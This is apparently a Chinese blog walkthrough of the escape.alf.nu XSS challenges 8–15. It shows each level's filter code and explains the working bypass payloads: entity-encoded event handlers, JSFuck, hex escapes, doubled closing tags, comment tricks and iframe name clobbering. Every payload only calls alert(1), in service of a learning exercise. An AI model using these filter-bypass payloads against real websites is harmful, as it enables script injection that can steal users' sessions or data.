上次讲了challenge 0-7,我的应该比别人的会详细一点吧,其实这需要有一定的xss的实践(自己搭环境搞个没过滤的就可以了),要熟悉js

废话不多说,直接上挑战,注:要alert(1)才能通关

 

challenge 8

function escape(s) {
  // Courtesy of Skandiabanken
  return '<script>console.log("' + s.toUpperCase() + '")</script>';
}
这里是将我们输入的转化为大写了
 
那我们试试html实体字符,就是&#后面加十进制ascii,当让也可以十六进制,如&#x61,在后面加个x就行
我们只转化英文就行
alert   ------> &#97&#108&#101&#114&#116
由于是html实体字符,只能在html元素生效吧,我们放在img标签看看
escape.alf.nu XSS Challenges 8-15 之进阶的XSS_.net

还有的话,html对大小写不敏感,就是大小写的意思是一样的

闭合好就行啦,不足的就是有点长

payload:</script><img src="1.jpg" οnerrοr=&#97&#108&#101&#114&#116(1)><script>

escape.alf.nu XSS Challenges 8-15 之进阶的XSS_.net_02

还有其他payload和改造

</script><img src="1.jpg" οnerrοr=&#97&#108&#101&#114&#116(1)//

</script><svg οnlοad=&#97&#108&#101&#114&#116(1)//

十六进制的

</script><svg οnlοad=&#x61&#x6C&#x65&#x72&#x74(1)//

escape.alf.nu XSS Challenges 8-15 之进阶的XSS_3c_03

当然还可以在自己的服务器上放个js文件,文件内容:alert(1);

escape.alf.nu XSS Challenges 8-15 之进阶的XSS_json_04

如果你有短域名,使用的字符长度就会更短了,短链接应该也不够短

 

challenge 9

function escape(s) {
  // This is sort of a spoiler for the last level :-)

  if (/[\\<>]/.test(s)) return '-';

  return '<script>console.log("' + s.toUpperCase() + '")</script>';
}
这里经过实践,一旦匹配到 \ ,<,和>就会直接返回‘-’
又大写,又不能输入<, 能不能对alert变换一下呢
做过ctf的应该很经常看到jsfuck,加密网站:http://www.jsfuck.com/
escape.alf.nu XSS Challenges 8-15 之进阶的XSS_3c_05
这字符就有点多了
escape.alf.nu XSS Challenges 8-15 之进阶的XSS_.net_06
之前在freebuf看到有个也是不用字母的js加密转换,记起来再写吧
 

challenge 10

function escape(s) {
  function htmlEscape(s) {
    return s.replace(/./g, function(x) {
       return { '<': '&lt;', '>': '&gt;', '&': '&amp;', '"': '&quot;', "'": '&#39;' }[x] || x;       
     });
  }

  function expandTemplate(template, args) {
    return template.replace(
        /{(\w+)}/g, 
        function(_, n) { 
           return htmlEscape(args[n]);
         });
  }
  
  return expandTemplate(
    "                                                \n\
      <h2>Hello, <span id=name></span>!</h2>         \n\
      <script>                                       \n\
         var v = document.getElementById('name');    \n\
         v.innerHTML = '<a href=#>{name}</a>';       \n\
      <\/script>                                     \n\
    ",
    { name : s }
  );
}
首先我们看最后一个return,调用expandTemplate函数对一串html元素处理,而expandTemplate里面又调用了htmlEscape
 

expandTemplate函数好像没什么用,知道的大神麻烦告诉我

escape.alf.nu XSS Challenges 8-15 之进阶的XSS_.net_07

htmlEscape对单双引号,&和<,>都转化为html实体字符了,但没过滤\转义符

,那么我们使用十六进制看看

escape.alf.nu XSS Challenges 8-15 之进阶的XSS_3c_08

payload:  \x3cimg src=123 οnerrοr=alert(1)//\x3c为小于号的十六进制

escape.alf.nu XSS Challenges 8-15 之进阶的XSS_十六进制_09

可以看到js在处理字符串时会将16进制转化为字符

escape.alf.nu XSS Challenges 8-15 之进阶的XSS_json_10

其他payload,\x3e为大于号十六进制

\x3cimg src=123 οnerrοr=alert(1)\x3e

\x3csvg οnlοad=alert(1)// svg这个是html5的画布元素吧

 

challenge 11

function escape(s) {
  // Spoiler for level 2
  s = JSON.stringify(s).replace(/<\/script/gi, '');

  return '<script>console.log(' + s + ');</script>';
}
stringify可转义",后面的replace是替换</script为空字符,g是全局模式,就是从头搜索到尾,无论有多少,i就忽略大小写
在sql注入中,替换为空,我们就双写就行了
 
payload: </sc</scriptript><script>alert(1)// 
当然双写可以随便搞
 </</scriptscript><script>alert(1)// 
 </s</scriptcript><script>alert(1)// 
............................等
escape.alf.nu XSS Challenges 8-15 之进阶的XSS_json_11

 

 

challenge 12

 

function escape(s) {
  // Pass inn "callback#userdata"
  var thing = s.split(/#/); 

  if (!/^[a-zA-Z\[\]']*$/.test(thing[0])) return 'Invalid callback';
  var obj = {'userdata': thing[1] };
  var json = JSON.stringify(obj).replace(/\//g, '\\/');
  return "<script>" + thing[0] + "(" + json +")</script>";
}

 

 var thing = s.split(/#/)

以#分隔两部分输入

if (!/^[a-zA-Z\[\]']*$/.test(thing[0])) return 'Invalid callback';

#号 左边的只能输入大小写字母和左右中括号

var json = JSON.stringify(obj).replace(/\//g, '\\/');

会转义",后面的replace替换/为\\/,其实就是替换为\/

escape.alf.nu XSS Challenges 8-15 之进阶的XSS_3c_12

原来html的注释也可以的,那就简单了

escape.alf.nu XSS Challenges 8-15 之进阶的XSS_.net_13

单引号闭合前面,后面注释

payload: '#';alert(1);<!--

escape.alf.nu XSS Challenges 8-15 之进阶的XSS_html_14

 

challenge 13

 

function escape(s) {
  var tag = document.createElement('iframe');

  // For this one, you get to run any code you want, but in a "sandboxed" iframe.
  //
  // http://print.alf.nu/?html=... just outputs whatever you pass in.
  //
  // Alerting from print.alf.nu won't count; try to trigger the one below.

  s = '<script>' + s + '<\/script>';
  tag.src = 'http://print.alf.nu/?html=' + encodeURIComponent(s);

  window.WINNING = function() { youWon = true; };

  tag.onload = function() {
    if (youWon) alert(1);
  };
  document.body.appendChild(tag);
}
encodeURIComponent() 函数其实就是url编码吧

 

我们注意一下iframe,当在iframe中设置了一个name属性之后, 这个name属性的值就会变成iframe中的window对象的全局。

比如下面的abc

escape.alf.nu XSS Challenges 8-15 之进阶的XSS_3c_15

搞个通俗点的

escape.alf.nu XSS Challenges 8-15 之进阶的XSS_json_16

还有个细节,就是那个网址,直接返回js,设置iframe的name属性

escape.alf.nu XSS Challenges 8-15 之进阶的XSS_json_17

那么payload:name='youWon'

escape.alf.nu XSS Challenges 8-15 之进阶的XSS_3c_18

 

challenge 14

 

function escape(s) {
  function json(s) { return JSON.stringify(s).replace(/\//g, '\\/'); }
  function html(s) { return s.replace(/[<>"&]/g, function(s) {
                        return '&#' + s.charCodeAt(0) + ';'; }); }

  return (
    '<script>' +
      'var url = ' + json(s) + '; // We\'ll use this later ' +
    '</script>\n\n' +
    '  <!-- for debugging -->\n' +
    '  URL: ' + html(s) + '\n\n' +
    '<!-- then suddenly -->\n' +
    '<script>\n' +
    '  if (!/^http:.*/.test(url)) console.log("Bad url: " + url);\n' +
    '  else new Image().src = url;\n' +
    '</script>'
  );
}

首先我们看返回函数,返回了两个script,第一个<script>用json(s)函数构造一个url,跟着中间用html()输出URL

第二个script如果成功绕过就新建一个我们url的图像

json函数过滤双引号和注释符

html函数过滤了<>"&

先看看什么效果

escape.alf.nu XSS Challenges 8-15 之进阶的XSS_3c_19

由于比较复杂,直接用别人的payload进行解释了

alert(1);/*<!--<script>*/if(/a//*  

escape.alf.nu XSS Challenges 8-15 之进阶的XSS_html_20

将右边的复制到我们本地测试

escape.alf.nu XSS Challenges 8-15 之进阶的XSS_.net_21

我们可以看到,我们输入的最后一个/*将下面的很多都注释掉了,把绿色的代码去掉,简化一下代码就是

 

var url = "alert(1);\/*<!--<script>*\/if(\/a\/\/*  "; 
URL: alert(1);if(/a/.test(url)) console.log("Bad url: " + url);
else new Image().src = url;
再简化一下

 

escape.alf.nu XSS Challenges 8-15 之进阶的XSS_十六进制_22

再简化一下

escape.alf.nu XSS Challenges 8-15 之进阶的XSS_json_23

 

 

challenge 15

 

function escape(s) {
  return s.split('#').map(function(v) {
      // Only 20% of slashes are end tags; save 1.2% of total
      // bytes by only escaping those.
      var json = JSON.stringify(v).replace(/<\//g, '<\\/');
      return '<script>console.log('+json+')</script>';
      }).join('');
}

payload:<!--<script>#)/;alert(1)//-->  

 

最后生成代码:<script>console.log("<!--<script>")</script><script>console.log(")/;alert(1)//-->  ")</script>,复制到本地

直接将中间的敲在控制台上

console.log("<!--<script>")</script><script>console.log(")/;alert(1)//-->  ")

escape.alf.nu XSS Challenges 8-15 之进阶的XSS_十六进制_24

简化一下就是;console.log("<!--<script>")   <        /script><script>console.log(")/;       alert(1)

console    小于号    /正则表达式/ ;  alert(1)

所以语法上是正确的

escape.alf.nu XSS Challenges 8-15 之进阶的XSS_.net_25

其实就是两条语句

 

escape.alf.nu XSS Challenges 8-15 之进阶的XSS_json_26

好了欢迎大家与我交流

 

 

网络上志同道合,我们一起学习网络安全,一起进步,QQ群:694839022